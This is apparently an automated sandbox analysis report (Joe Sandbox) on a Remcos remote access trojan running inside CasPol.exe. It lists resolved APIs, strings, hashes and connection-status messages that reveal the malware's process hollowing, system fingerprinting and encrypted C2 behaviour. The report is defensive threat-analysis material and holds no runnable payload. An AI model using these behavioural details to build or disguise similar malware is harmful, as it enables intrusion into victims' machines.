Function 07601EF9 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0914f0c64aed4d80f405585b07a48749e2c79ea7d85334ac3845f76fb84f4b
Instruction ID: cd2d39b72e63cc26d2db43441cf15eb43b627b35947f0fe83149fdb4373182db
Opcode Fuzzy Hash: ca0914f0c64aed4d80f405585b07a48749e2c79ea7d85334ac3845f76fb84f4b
Instruction Fuzzy Hash: 1C31B1B0A0430A8FCB1D8F35C498AAABBE1BF86310F088166D54A8B291D770C985CBD1

Function 02DCD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2432068834.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2dcd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5daa5e84c411ec945e9e95d14ce51f659b163e49a3fcb96b735727b9a9b9d6d
Instruction ID: c13879094ce8e2d19bf28b9ec952597ba4680ebb5e8e0b6c6f36b142e299ce21
Opcode Fuzzy Hash: b5daa5e84c411ec945e9e95d14ce51f659b163e49a3fcb96b735727b9a9b9d6d
Instruction Fuzzy Hash: 0701DF31405305AAE7208A29CD80B66BF98EB81334F38852EED480B242C3789846DAB1

Function 02DCD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2432068834.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2dcd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21231217f3c4aa210663d47e106fca1b43b53dedb74ef035ce0fd8842965a2d0
Instruction ID: 1fd734c413851cb944dc7ae647405df4cce57628cf73662bbbc9c4307e4886f0
Opcode Fuzzy Hash: 21231217f3c4aa210663d47e106fca1b43b53dedb74ef035ce0fd8842965a2d0
Instruction Fuzzy Hash: 5B01526100E3C05FE7128B258C94B56BFB4EF43224F2D81DBD9888F2A3C3695849C772

Analysis Process: CasPol.exePID: 6860, Parent PID: 2704COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.6%
Total number of Nodes:	1062
Total number of Limit Nodes:	55

Executed Functions

Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
GetProcAddress.KERNEL32(00000000), ref: 0041BD11
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
GetProcAddress.KERNEL32(00000000), ref: 0041BD40
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
GetProcAddress.KERNEL32(00000000), ref: 0041BD54
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
GetProcAddress.KERNEL32(00000000), ref: 0041BD68
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
GetProcAddress.KERNEL32(00000000), ref: 0041BD78
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
GetProcAddress.KERNEL32(00000000), ref: 0041BD88
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
GetProcAddress.KERNEL32(00000000), ref: 0041BD98
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
GetProcAddress.KERNEL32(00000000), ref: 0041BE08
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
GetProcAddress.KERNEL32(00000000), ref: 0041BE19
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
GetProcAddress.KERNEL32(00000000), ref: 0041BE29
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
GetProcAddress.KERNEL32(00000000), ref: 0041BE63
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
GetProcAddress.KERNEL32(00000000), ref: 0041BE73

Strings

Kernel32, xrefs: 0041BD23
user32, xrefs: 0041BD4C, 0041BDC3, 0041BDD7, 0041BDEB
Iphlpapi, xrefs: 0041BE55, 0041BE5F, 0041BE6A
NtUnmapViewOfSection, xrefs: 0041BD5B
Shell32, xrefs: 0041BD9F
GlobalMemoryStatusEx, xrefs: 0041BD6A
GetExtendedUdpTable, xrefs: 0041BE65
GetSystemTimes, xrefs: 0041BDFA
NtResumeProcess, xrefs: 0041BE40
SetProcessDEPPolicy, xrefs: 0041BDAE
GetProcessImageFileNameW, xrefs: 0041BCFD, 0041BD02, 0041BD22
GetMonitorInfoW, xrefs: 0041BDE6
Shlwapi, xrefs: 0041BE0C
kernel32, xrefs: 0041BD6F, 0041BD74, 0041BD7F, 0041BD8F, 0041BDB3, 0041BDFF, 0041BE20
IsWow64Process, xrefs: 0041BD7A
ntdll, xrefs: 0041BD60, 0041BE30, 0041BE3A, 0041BE4A
NtSuspendProcess, xrefs: 0041BE2B
GetConsoleWindow, xrefs: 0041BE1B
IsUserAnAdmin, xrefs: 0041BD9A
Psapi, xrefs: 0041BD03
EnumDisplayMonitors, xrefs: 0041BDD2
SetProcessDpiAwareness, xrefs: 0041BD32, 0041BD37, 0041BD4B
GetComputerNameExW, xrefs: 0041BD8A
EnumDisplayDevicesW, xrefs: 0041BDBE
GetExtendedTcpTable, xrefs: 0041BE50
shcore, xrefs: 0041BD38

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 384173800-625181639
Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500

Sleep.KERNELBASE(00000BB8), ref: 0040E603
ExitProcess.KERNEL32 ref: 0040E672

Strings

5.3.0 Pro, xrefs: 0040E5DE, 0040E64B
BG, xrefs: 0040E560
override, xrefs: 0040E574
pth_unenc, xrefs: 0040E565, 0040E5AC, 0040E619

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.3.0 Pro$override$pth_unenc$BG
API String ID: 2281282204-3981147832
Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF

Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(?), ref: 00404946
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040495C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA

Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C

Function 0041A7B2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790

Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF

Strings

Access Level: , xrefs: 0040E047
XCG, xrefs: 0040DEF4
XCG, xrefs: 0040DE78
@CG, xrefs: 0040DCBE
del, xrefs: 0040E094, 0040E0F4
XCG, xrefs: 0040DF93
BG, xrefs: 0040DBB6
User, xrefs: 0040E038
dCG, xrefs: 0040DFC4
XCG, xrefs: 0040DECB
Inj, xrefs: 0040D977, 0040D98E
(CG, xrefs: 0040D8A7
0DG, xrefs: 0040D914
XCG, xrefs: 0040DDBF
XCG, xrefs: 0040DF27
Exe, xrefs: 0040D8B1
`=G, xrefs: 0040DF48
BG, xrefs: 0040DCF6
(CG, xrefs: 0040D904
licence, xrefs: 0040DD25
license_code.txt, xrefs: 0040D7EF
XCG, xrefs: 0040D838
BG, xrefs: 0040DBC0
XCG, xrefs: 0040DDD6
Administrator, xrefs: 0040E02C
XCG, xrefs: 0040DEA3
exepath, xrefs: 0040DC34, 0040DCDE
XCG, xrefs: 0040DC4E
Software\, xrefs: 0040D865
XCG, xrefs: 0040DAE9
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0040D788, 0040DBB1
XCG, xrefs: 0040DB1D
Remcos Agent initialized, xrefs: 0040DD8C
BG, xrefs: 0040DBF5
XCG, xrefs: 0040DF67
del, xrefs: 0040E078
@CG, xrefs: 0040DC07
XCG, xrefs: 0040DD01
XCG, xrefs: 0040DB75
XCG, xrefs: 0040D7FF
BG, xrefs: 0040DC1C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
API String ID: 2830904901-3665108517
Opcode ID: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
Opcode Fuzzy Hash: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
WSAGetLastError.WS2_32 ref: 00414249
Sleep.KERNELBASE(00000000,00000002), ref: 00414B88

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

| , xrefs: 004141CA, 00414310
XCG, xrefs: 004143DC
name, xrefs: 0041441A
dCG, xrefs: 004145AF
XCG, xrefs: 00414001
Connecting | , xrefs: 004141C0
Connection Error: , xrefs: 0041425A
hlight, xrefs: 00414447
>G, xrefs: 004144D7
5.3.0 Pro, xrefs: 0041457C
Disconnected, xrefs: 00414AF8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00414474
`=G, xrefs: 0041454A
Connected | , xrefs: 0041430B
Connection Error: Unable to create socket, xrefs: 004142A4
%I64u, xrefs: 004143AD
TLS Off, xrefs: 00414193, 004141A6
BG, xrefs: 004144B0
XCG, xrefs: 00414B4F
TLS On , xrefs: 004141A1
>G, xrefs: 00414499
@CG, xrefs: 004143F4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
API String ID: 524882891-2450167416
Opcode ID: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
Opcode Fuzzy Hash: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004042A5
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

Connection Refused, xrefs: 0040443E
Connection Failed: , xrefs: 0040440C
TLS Authentication Failed, xrefs: 0040435E
TLS Handshake... | , xrefs: 004042C9
TLS Error 2, xrefs: 0040431A
TLS Error 3, xrefs: 0040439D
TLS Error 1, xrefs: 004042FC

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
closesocket.WS2_32(000000FF), ref: 0040481F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04

Strings

AppData, xrefs: 0040C9BB
UserProfile, xrefs: 0040C9C2
SystemDrive, xrefs: 0040C8FB
WinDir, xrefs: 0040C905, 0040C927, 0040C979
Temp, xrefs: 0040C8D0
\SysWOW64, xrefs: 0040C96A
ProgramFiles, xrefs: 0040C9D8
\system32, xrefs: 0040C918
ProgramData, xrefs: 0040C9C9

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C

Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F

StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9

Strings

(32 bit), xrefs: 0041A511
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041A487, 0041A491, 0041A4CF
ProductName, xrefs: 0041A482
(64 bit), xrefs: 0041A516, 0041A520
CurrentBuildNumber, xrefs: 0041A4CA
0JG, xrefs: 0041A4A2

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-3211212173
Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
